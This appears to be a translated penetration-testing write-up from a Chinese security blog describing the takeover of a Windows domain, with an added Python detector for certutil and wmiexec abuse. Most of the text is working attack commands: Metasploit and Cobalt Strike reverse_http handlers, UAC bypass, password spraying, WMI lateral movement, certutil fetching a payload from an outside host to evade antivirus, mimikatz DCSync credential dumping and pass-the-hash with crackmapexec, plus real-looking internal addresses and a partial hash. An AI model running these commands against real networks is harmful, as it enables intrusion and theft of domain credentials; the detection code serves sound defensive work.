Introduction
Metasploit privilege escalation
MSF:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
CS:
Create a listener: windows/foreign/reverse_http
Run the listener: spawn msf
run post/multi/recon/local_exploit_suggester
exploit/windows/local/bypassuac_sdclt
MSF:
background
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set session 3
run
CS:
windows/beacon_http/reverse_http
Since the current beacon is not SYSTEM, and we already have the local administrator's hash and plaintext password, just psexec locally with the local administrator password to get a new session:
Lateral movement in the internal network
At this point we find we have a SYSTEM Beacon session! But there is no domain admin process on the host, so we have to find another way. Next, spray the captured password against other hosts in the domain:
Then move laterally over WMI:
proxychains python3 wmiexec.py -shell-type cmd administrator:password@10.226.0.108 -codec gbk
Bypassing Norton AV to get a session in CobaltStrike
certutil.exe -urlcache -split -f http://inbug.org:80/download/main.exe
certutil -encode main.exe main.txt
certutil.exe -urlcache -split -f http://inbug.org:80/download/main.txt
certutil -decode main.txt main.exe
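Added detection example, not code from the original post: Python that flags the two behaviours shown above, certutil being used to fetch and then decode a payload, and cmd.exe spawned by WmiPrvSE.exe with the output-redirection pattern wmiexec.py uses, over constructed process-creation records in Sysmon Event ID 1 shape (host names, paths and the example.invalid URL are assumptions).

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:  # minimal process-creation record, Sysmon Event ID 1 style fields
    host: str
    parent_image: str
    image: str
    cmdline: str

# Constructed sample events for this example; not captured from the post's environment.
SAMPLE_EVENTS = [
    ProcEvent("WS01", r"C:\Windows\explorer.exe", r"C:\Windows\System32\certutil.exe",
              "certutil.exe -urlcache -split -f http://example.invalid/download/main.txt"),
    ProcEvent("WS01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\certutil.exe",
              "certutil -decode main.txt main.exe"),
    ProcEvent("SRV02", r"C:\Windows\System32\wbem\WmiPrvSE.exe", r"C:\Windows\System32\cmd.exe",
              r"cmd.exe /Q /c net user 1> \\127.0.0.1\ADMIN$\__1700000000.12 2>&1"),
    ProcEvent("SRV03", r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\certutil.exe",
              "certutil -verify cert.cer"),  # legitimate use: must not alert
]

# certutil abused as a downloader (-urlcache ... -f URL) or as a base64 encoder/decoder
CERTUTIL_DOWNLOAD = re.compile(r"-urlcache\b", re.I)
CERTUTIL_CODEC = re.compile(r"\s-(?:decode|encode)\b", re.I)
# wmiexec.py runs each command as "cmd.exe /Q /c <cmd> 1> \\127.0.0.1\ADMIN$\__<ts> 2>&1"
WMIEXEC_REDIRECT = re.compile(r"1>\s*\\\\127\.0\.0\.1\\ADMIN\$\\__", re.I)

def classify(ev: ProcEvent) -> list[str]:
    """Return the detection labels that apply to one event (empty if nothing matched)."""
    image = ev.image.rsplit("\\", 1)[-1].lower()
    parent = ev.parent_image.rsplit("\\", 1)[-1].lower()
    hits = []
    if image == "certutil.exe":
        if CERTUTIL_DOWNLOAD.search(ev.cmdline):
            hits.append("certutil-download")
        if CERTUTIL_CODEC.search(ev.cmdline):
            hits.append("certutil-encode-decode")
    if image == "cmd.exe" and parent == "wmiprvse.exe":
        hits.append("wmi-spawned-cmd")  # cmd.exe under the WMI provider host: remote execution
        if WMIEXEC_REDIRECT.search(ev.cmdline):
            hits.append("wmiexec-output-redirect")
    return hits

def scan(events) -> list[tuple[str, list[str]]]:
    """Keep only (host, labels) for events that raised at least one label."""
    return [(ev.host, hits) for ev in events if (hits := classify(ev))]
```

Feeding real Sysmon or EDR process-creation telemetry into `scan()` with the same four fields is enough to surface both stages of the chain described in this post.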
Token theft to obtain domain admin
beacon> shell net group "Domain Controllers" /domain
[*] Tasked beacon to run: net group "Domain Controllers" /domain
[+] host called home, sent: 69 bytes
[+] received output:
The request will be processed at a domain controller for domain inbug.org.
Group name Domain Controllers
Comment All domain controllers in the domain
Members
-------------------------------------------------------------------------------
xxADC01$ 192.168.101.4
xxxxN024$ 192.168.0.20
xxxGN042$ 192.168.0.154
xxxGN043$ 192.168.0.19
xxxGN052$ 192.168.0.14
xxxGN053$ 192.168.0.31
xxSERVER1$ 10.226.0.150
xxPSERVER116$ 10.225.241.149
xxSERVER400$ 192.168.105.5
xxSERVER401$ 192.168.105.6
xxSERVER505$ 10.231.1.15
xxSERVER506$ 10.232.55.60
xxSERVER600$ 10.227.69.108
xxSERVER813$ 10.225.240.16
The command completed successfully.
mimikatz lsadump::dcsync /domain:psnet.com /all /csv
mimikatz lsadump::dcsync /domain:inbug.org /user:Administrator
proxychains crackmapexec smb 192.168.0.0/24 -u administrator -H 4a03985f63e4dxxxxxxx -d inbug.org -x "net user"
At this point the game is over! Finally, a look at the information inside the domain:
execute-assembly /Users/saulgoodman/Downloads/SharpHound.exe -c all
This article was first published on the WeChat public account InBug实验室 (InBug Lab): "如何打穿几千台机器的内网域渗透?当然是靠 WMI 横向移动了" (How do you break through an internal domain of several thousand machines? With WMI lateral movement, of course).
Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided only for security research and teaching; readers who use this information for any other purpose bear full legal and joint liability, and this site bears none. Questions can be sent by e-mail (a corporate or otherwise valid mailbox is recommended so the mail is not blocked; contact details are on the home page).